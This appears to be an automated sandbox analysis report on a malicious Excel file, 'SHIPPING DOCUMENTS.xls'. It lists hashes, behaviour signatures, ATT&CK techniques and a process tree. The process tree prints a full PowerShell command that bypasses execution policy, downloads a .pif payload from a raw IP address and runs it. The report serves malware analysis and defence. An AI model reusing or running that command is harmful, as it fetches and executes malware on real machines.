Analysis

  • max time kernel
    102s
  • max time network
    32s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
  • submitted
    23-03-2023 14:51

General

  • Target

    SHIPPING DOCUMENTS.xls

  • Size

    1.5MB

  • MD5

    518e41c69dec599380cccb991d047e16

  • SHA1

    5b061c85b3c5be0079bdc830389f197c059e6f44

  • SHA256

    a26cf1908d8e2e9ab6e9b3fdf31d6cb5d58d7035374cd513b459a1541cc2fc79

  • SHA512

    b7f0e1f2cdb7edda83180262d4bd138f06a24a9335a4e437903806398dbdd25f4170bfe967b1cf476c73a865db3bffdf31a8957ed2683188e9a1aecaf790c761

  • SSDEEP

    24576:w+3bqIKPsoGRwGtt6EaSE8hpaMNzl8raUtGCn113q49zuCr2+zm/E0IEWQNLGBuu:DrtKjG/n6Ead9MNzlMRtGCn113q496CJ

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\SHIPPING DOCUMENTS.xls"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1376
    • C:\Windows\SysWOW64\wscript.exe
      wscript C:\Users\Public\textfile.wsf
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1096
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "& { Invoke-WebRequest -Uri 'http://37.139.128.83/black/b.pif' -OutFile 'C:\Users\Public\b.pif'; C:\Users\Public\b.pif }"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1960

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion
    • Modify Registry (T1112): 1
  • Discovery
    • System Information Discovery (T1082): 2
    • Query Registry (T1012): 1

Downloads

  • C:\Users\Public\textfile.wsf
    Filesize

    86B

    MD5

    2955b01463b39ba248cb5b4fbfd8e9ba

    SHA1

    c344f249d03b7e71caecfd77377fb159df195b02

    SHA256

    1995096acdc328fc0af410df38db69ce77f3e0598cfdb8c03561db229f21e797

    SHA512

    007313112bd9a32b7dea45221c8d7dc2d253e6f543d8518062e41bd403fe67d286aa44db3b6027cdfcefb8e2428e14402e20071fb60ffd09a638894bb4edd8a7

  • memory/1376-64-0x00000000073E0000-0x00000000073F0000-memory.dmp
    Filesize

    64KB

  • memory/1376-60-0x00000000063C0000-0x00000000064C0000-memory.dmp
    Filesize

    1024KB

  • memory/1376-61-0x00000000073E0000-0x00000000073F0000-memory.dmp
    Filesize

    64KB

  • memory/1376-62-0x00000000073E0000-0x00000000073F0000-memory.dmp
    Filesize

    64KB

  • memory/1376-65-0x00000000073E0000-0x00000000073F0000-memory.dmp
    Filesize

    64KB

  • memory/1376-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1376-63-0x00000000073E0000-0x00000000073F0000-memory.dmp
    Filesize

    64KB

  • memory/1376-72-0x00000000063C0000-0x00000000064C0000-memory.dmp
    Filesize

    1024KB

  • memory/1376-73-0x00000000073E0000-0x00000000073F0000-memory.dmp
    Filesize

    64KB

  • memory/1376-74-0x00000000073E0000-0x00000000073F0000-memory.dmp
    Filesize

    64KB

  • memory/1376-75-0x00000000073E0000-0x00000000073F0000-memory.dmp
    Filesize

    64KB

  • memory/1376-78-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1960-71-0x0000000001BD0000-0x0000000001C10000-memory.dmp
    Filesize

    256KB